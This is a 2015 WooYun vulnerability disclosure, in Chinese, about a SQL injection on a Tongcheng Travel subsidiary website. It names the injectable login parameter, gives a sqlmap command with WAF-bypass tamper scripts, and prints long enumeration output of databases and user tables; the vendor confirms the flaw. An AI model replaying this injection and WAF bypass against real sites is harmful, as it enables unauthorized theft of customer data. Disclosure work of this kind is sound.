同程旅游旗下某旅游网站SQL注射漏洞危机该站数据（绕waf）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098572

漏洞标题：同程旅游旗下某旅游网站SQL注射漏洞危机该站数据（绕waf）

漏洞作者： BMa

提交时间：2015-02-27 18:31

修复时间：2015-04-13 18:32

公开时间：2015-04-13 18:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-27：细节已通知厂商并且等待厂商处理中
2015-02-27：厂商已经确认，细节仅向厂商公开
2015-03-09：细节向核心白帽子及相关领域专家公开
2015-03-19：细节向普通白帽子公开
2015-03-29：细节向实习白帽子公开
2015-04-13：细节向公众公开

简要描述：

同程旅游某站拖走全网库
听说你们的rank很不错哦

详细说明：

注入：

http://www.tycts.com:80/website/websitelayout8/login/index (POST)
name=1&password=e

参数：name
存在过滤，使用tamper
www.tycts.com\sql1\1.txt -p name --risk 3 --tamper space2mssqlhash.py,space2hash.py,charencode.py,charunicodeencode.py,space2comment.py --current-db
上图：
current database: 'TCLine'

current user: '17uLXSLine'

available databases [10]:
[*] 17u_net
[*] master
[*] model
[*] msdb
[*] TCB2cBlog
[*] TCB2cWenDa
[*] TCLineBase
[*] TCLineResource
[*] TCShare
[*] tempdb

可以拖走全网库，本来是想用count来看看的，奈何表太多了，弄一些证明一下：

[14:48:48] [INFO] fetching database names
[14:48:50] [INFO] the SQL query used returns 11 entries
[14:48:52] [INFO] retrieved: 17u_net
[14:48:54] [INFO] retrieved: TCB2cBlog
[14:48:56] [INFO] retrieved: TCB2cWenDa
[14:48:58] [INFO] retrieved: TCLineBase
[14:49:01] [INFO] retrieved: TCLineBase
[14:49:03] [INFO] retrieved: TCLineResource
[14:49:05] [INFO] retrieved: TCShare
[14:49:07] [INFO] retrieved: master
[14:49:09] [INFO] retrieved: model
[14:49:12] [INFO] retrieved: msdb
[14:49:14] [INFO] retrieved: tempdb
[14:49:14] [INFO] fetching tables for databases: 17u_net, TCB2cBlog, TCB2cWenDa,
 TCLineBase, TCLineResource, TCShare, master, model, msdb, tempdb
[14:49:22] [INFO] the SQL query used returns 5 entries
[14:49:24] [INFO] retrieved: dbo.Line_TCPF_GroupArea
[14:49:26] [INFO] retrieved: dbo.MSreplication_objects
[14:49:29] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:49:34] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:49:37] [INFO] retrieved: dbo.MSsubscription_agents
[14:49:39] [WARNING] the SQL query provided does not return any output
[14:49:39] [WARNING] the SQL query provided does not return any output
[14:49:42] [WARNING] the SQL query provided does not return any output
[14:49:42] [WARNING] the SQL query provided does not return any output
[14:49:45] [INFO] the SQL query used returns 9 entries
[14:49:47] [INFO] retrieved: dbo.MSreplication_objects
[14:49:50] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:49:55] [INFO] retrieved: dbo.MSsavedforeignkeycolumns
[14:49:56] [INFO] retrieved: dbo.MSsavedforeignkeyextendedproperties
[14:50:00] [INFO] retrieved: dbo.MSsavedforeignkeys
[14:50:02] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:50:04] [INFO] retrieved: dbo.MSsubscription_agents
[14:50:06] [INFO] retrieved: dbo.b2c_cn_blog_article
[14:50:09] [INFO] retrieved: dbo.b2c_cn_blog_userControl
[14:50:11] [INFO] the SQL query used returns 17 entries
[14:50:14] [INFO] retrieved: dbo.DataDictionary
[14:50:16] [INFO] retrieved: dbo.KeywordsSource
[14:50:18] [INFO] retrieved: dbo.LineKeywords
[14:50:20] [INFO] retrieved: dbo.Line_CustomFunction
[14:50:23] [INFO] retrieved: dbo.Line_Member_CustomFunction
[14:50:26] [INFO] retrieved: dbo.MSreplication_objects
[14:50:28] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:50:30] [INFO] retrieved: dbo.MSsavedforeignkeycolumns
[14:50:32] [INFO] retrieved: dbo.MSsavedforeignkeyextendedproperties
[14:50:34] [INFO] retrieved: dbo.MSsavedforeignkeys
[14:50:36] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:50:38] [INFO] retrieved: dbo.MSsubscription_agents
[14:50:41] [INFO] retrieved: dbo.MemberUnionPayAccount
[14:50:43] [INFO] retrieved: dbo.Sys_Parameter
[14:50:45] [INFO] retrieved: dbo.ZFXApply
[14:50:48] [INFO] retrieved: dbo.ZFX_MemberLoginList
[14:50:51] [INFO] retrieved: dbo.ZFX_MemberLoginList
[14:50:53] [INFO] the SQL query used returns 20 entries
[14:50:55] [INFO] retrieved: dbo.backupfile
[14:50:57] [INFO] retrieved: dbo.backupmediafamily
[14:50:59] [INFO] retrieved: dbo.backupmediaset
[14:51:01] [INFO] retrieved: dbo.backupset
[14:51:04] [INFO] retrieved: dbo.logmarkhistory
[14:51:07] [INFO] retrieved: dbo.restorefilegroup
[14:51:09] [INFO] retrieved: dbo.restorefilegroup
[14:51:13] [INFO] retrieved: dbo.restorehistory
[14:51:15] [INFO] retrieved: dbo.suspect_pages
[14:51:18] [INFO] retrieved: dbo.syspolicy_conditions
[14:51:20] [INFO] retrieved: dbo.syspolicy_configuration
[14:51:22] [INFO] retrieved: dbo.syspolicy_object_sets
[14:51:24] [INFO] retrieved: dbo.syspolicy_policies
[14:51:26] [INFO] retrieved: dbo.syspolicy_policy_categories
[14:51:29] [INFO] retrieved: dbo.syspolicy_policy_category_subscriptions
[14:51:32] [INFO] retrieved: dbo.syspolicy_policy_execution_history_details
[14:51:34] [INFO] retrieved: dbo.syspolicy_policy_execution_history_details
[14:51:36] [INFO] retrieved: dbo.syspolicy_system_health_state
[14:51:40] [INFO] retrieved: dbo.syspolicy_target_set_levels
[14:51:43] [INFO] retrieved: dbo.syspolicy_target_sets
[14:51:45] [INFO] the SQL query used returns 5 entries
[14:51:47] [INFO] retrieved: dbo.b2c_cn_answer
[14:51:52] [INFO] retrieved: dbo.b2c_cn_question_Relation
[14:51:54] [INFO] retrieved: dbo.b2c_cn_question_Relation
[14:51:56] [INFO] retrieved: dbo.b2c_cn_question_class
[14:51:58] [INFO] retrieved: dbo.dtproperties
[14:52:01] [INFO] the SQL query used returns 359 entries
[14:52:04] [INFO] retrieved: INFORMATION_SCHEMA.CHECK_CONSTRAINTS
[14:52:07] [INFO] retrieved: INFORMATION_SCHEMA.COLUMNS
[14:52:10] [INFO] retrieved: INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE
[14:52:13] [INFO] retrieved: INFORMATION_SCHEMA.COLUMN_PRIVILEGES
[14:52:17] [INFO] retrieved: INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE
[14:52:21] [INFO] retrieved: INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE
[14:52:26] [INFO] retrieved: INFORMATION_SCHEMA.DOMAINS
[14:52:30] [INFO] retrieved: INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS
[14:52:34] [INFO] retrieved: INFORMATION_SCHEMA.KEY_COLUMN_USAGE
[14:52:39] [INFO] retrieved: INFORMATION_SCHEMA.PARAMETERS
[14:52:44] [INFO] retrieved: INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS
[14:52:50] [INFO] retrieved: INFORMATION_SCHEMA.ROUTINES
[14:52:55] [INFO] retrieved: INFORMATION_SCHEMA.ROUTINE_COLUMNS
[14:53:01] [INFO] retrieved: INFORMATION_SCHEMA.SCHEMATA
[14:53:07] [INFO] retrieved: INFORMATION_SCHEMA.TABLES
[14:53:13] [INFO] retrieved: INFORMATION_SCHEMA.TABLE_CONSTRAINTS
[14:53:22] [INFO] retrieved: INFORMATION_SCHEMA.TABLE_PRIVILEGES
[14:53:28] [INFO] retrieved: INFORMATION_SCHEMA.VIEWS
[14:53:37] [INFO] retrieved: INFORMATION_SCHEMA.VIEW_COLUMN_USAGE
[14:53:44] [INFO] retrieved: INFORMATION_SCHEMA.VIEW_TABLE_USAGE
[14:53:51] [INFO] retrieved: dbo.spt_fallback_db
[14:53:59] [INFO] retrieved: dbo.spt_fallback_dev
[14:54:07] [INFO] retrieved: dbo.spt_fallback_usg
[14:54:15] [INFO] retrieved: dbo.spt_monitor
[14:54:23] [WARNING] user aborted during enumeration. sqlmap will display partia
l output
[14:54:25] [INFO] the SQL query used returns 17 entries
[14:54:27] [INFO] retrieved: dbo.B2C_user
[14:54:29] [INFO] retrieved: dbo.MSreplication_objects
[14:54:32] [INFO] retrieved: dbo.MSreplication_subscriptions
[14:54:34] [INFO] retrieved: dbo.MSsavedforeignkeycolumns
[14:54:37] [INFO] retrieved: dbo.MSsavedforeignkeyextendedproperties
[14:54:41] [INFO] retrieved: dbo.MSsavedforeignkeys
[14:54:43] [INFO] retrieved: dbo.MSsnapshotdeliveryprogress
[14:54:45] [INFO] retrieved: dbo.MSsubscription_agents
[14:54:47] [INFO] retrieved: dbo.MemberInfoExtend
[14:54:49] [INFO] retrieved: dbo.MemberInfoExtend
[14:54:51] [INFO] retrieved: dbo.UserDeliverAddress
[14:54:54] [INFO] retrieved: dbo.b2cUserLoginLog
[14:54:56] [INFO] retrieved: dbo.b2c_cn_scenery_place
[14:54:58] [INFO] retrieved: dbo.globalControl
[14:55:01] [INFO] retrieved: dbo.guojiadiqudata
[14:55:05] [INFO] retrieved: dbo.weathercomcncity
[14:55:08] [INFO] retrieved: dbo.weathercomcncity

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2015-02-27 18:34

厂商回复：

感谢关注同程旅游，兄弟看你这一串tamper脚本，绕过辛苦了，稍后会安排寄出300京东礼品卡以示谢意。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098572

漏洞标题：同程旅游旗下某旅游网站SQL注射漏洞危机该站数据（绕waf）

相关厂商：苏州同程旅游网络科技有限公司

漏洞作者： BMa

提交时间：2015-02-27 18:31

修复时间：2015-04-13 18:32

公开时间：2015-04-13 18:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098572

漏洞标题：同程旅游旗下某旅游网站SQL注射漏洞危机该站数据（绕waf）

相关厂商：苏州同程旅游网络科技有限公司

漏洞作者： BMa

提交时间：2015-02-27 18:31

修复时间：2015-04-13 18:32

公开时间：2015-04-13 18:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-098572"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：